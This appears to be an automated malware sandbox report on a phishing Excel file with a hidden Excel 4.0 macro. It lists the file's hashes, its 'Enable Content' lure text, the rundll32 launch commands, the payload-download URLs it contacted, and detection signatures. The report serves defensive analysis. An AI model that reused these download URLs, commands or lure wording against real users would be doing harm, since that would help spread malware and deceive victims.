Loading ...

Play interactive tourEdit tour

Analysis Report Complaint-1992179913-02182021.xls

Overview

General Information

Sample Name:Complaint-1992179913-02182021.xls
Analysis ID:356738
MD5:b2c46df91cfe891f61af65277461b32b
SHA1:fd329e179663a40c31f5c567228a59349928a6a5
SHA256:3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2328 cmdline: rundll32 ..\JDFR.hdfgr,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2524 cmdline: rundll32 ..\JDFR.hdfgr1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2684 cmdline: rundll32 ..\JDFR.hdfgr2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2804 cmdline: rundll32 ..\JDFR.hdfgr3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2948 cmdline: rundll32 ..\JDFR.hdfgr4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Complaint-1992179913-02182021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xadf2:$e1: Enable Editing
  • 0xae3c:$e1: Enable Editing
  • 0x158cc:$e1: Enable Editing
  • 0x15916:$e1: Enable Editing
  • 0x20083:$e1: Enable Editing
  • 0x200cd:$e1: Enable Editing
  • 0xae5a:$e2: Enable Content
  • 0x15934:$e2: Enable Content
  • 0x200eb:$e2: Enable Content
Complaint-1992179913-02182021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1084, ProcessCommandLine: rundll32 ..\JDFR.hdfgr,DllRegisterServer, ProcessId: 2328

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.datAvira URL Cloud: Label: malware

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Uses secure TLS version for HTTPS connectionsShow sources
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: rzminc.com
    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 138.36.237.100:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 72.52.227.180:80
    Source: Joe Sandbox ViewIP Address: 138.36.237.100 138.36.237.100
    Source: Joe Sandbox ViewIP Address: 68.66.216.42 68.66.216.42
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /xklyulyijvn/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /eznwcdhx/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pathinanchilearthmovers.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xjzpfwc/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jugueterialatorre.com.arConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /fdzgprclatqo/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: rzminc.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /otmchxmxeg/44250659496064800000.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: biblicalisraeltours.comConnection: Keep-Alive
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: unknownDNS traffic detected: queries for: rzminc.com
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
    Source: rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117781328.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117781328.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117781328.0000000001DA7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
    Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.22:49168 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Complaint-1992179913-02182021.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, please click Enabk 14 from the yellow bar above f y-t."|| I xa I 15 " lnn|| I F?
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enabli " ' ' 14 from the yellow bar above RunDLL |~| 15 16 Therewas
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Complaint-1992179913-02182021.xlsInitial sample: EXEC
    Source: Complaint-1992179913-02182021.xlsOLE indicator, VBA macros: true
    Source: Complaint-1992179913-02182021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: rundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
    Source: classification engineClassification label: mal84.expl.evad.winXLS@11/13@6/4
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\76DE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE17.tmpJump to behavior
    Source: Complaint-1992179913-02182021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServerJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServerJump to behavior
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: C:\Windows\System32\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint-1992179913-02182021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    rzminc.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    http://rzminc.com/fdzgprclatqo/44250659496064800000.dat0%Avira URL Cloudsafe
    http://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.dat0%Avira URL Cloudsafe
    http://biblicalisraeltours.com/otmchxmxeg/44250659496064800000.dat0%Avira URL Cloudsafe
    http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dat100%Avira URL Cloudmalware
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://rzminc.com/xklyulyijvn/44250659496064800000.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    rzminc.com
    72.52.227.180
    truefalseunknown
    biblicalisraeltours.com
    68.66.216.42
    truefalse
      unknown
      crt.sectigo.com
      91.199.212.52
      truefalse
        unknown
        jugueterialatorre.com.ar
        138.36.237.100
        truefalse
          unknown
          pathinanchilearthmovers.com
          162.241.80.6
          truefalse
            unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://rzminc.com/fdzgprclatqo/44250659496064800000.datfalse
            • Avira URL Cloud: safe
            unknown
            http://jugueterialatorre.com.ar/xjzpfwc/44250659496064800000.datfalse
            • Avira URL Cloud: safe
            unknown
            http://biblicalisraeltours.com/otmchxmxeg/44250659496064800000.datfalse
            • Avira URL Cloud: safe
            unknown
            http://pathinanchilearthmovers.com/eznwcdhx/44250659496064800000.dattrue
            • Avira URL Cloud: malware
            unknown
            http://rzminc.com/xklyulyijvn/44250659496064800000.datfalse
            • Avira URL Cloud: safe
            unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmpfalse
              high
              http://www.windows.com/pctv.rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.comrundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpfalse
                  high
                  http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000004.00000002.2141685711.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135628260.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2126075377.0000000001C00000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123580345.0000000001B30000.00000002.00000001.sdmpfalse
                    high
                    http://www.icra.org/vocabulary/.rundll32.exe, 00000004.00000002.2141875808.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2135776075.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2127097102.0000000001DE7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2123768215.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117781328.0000000001DA7000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
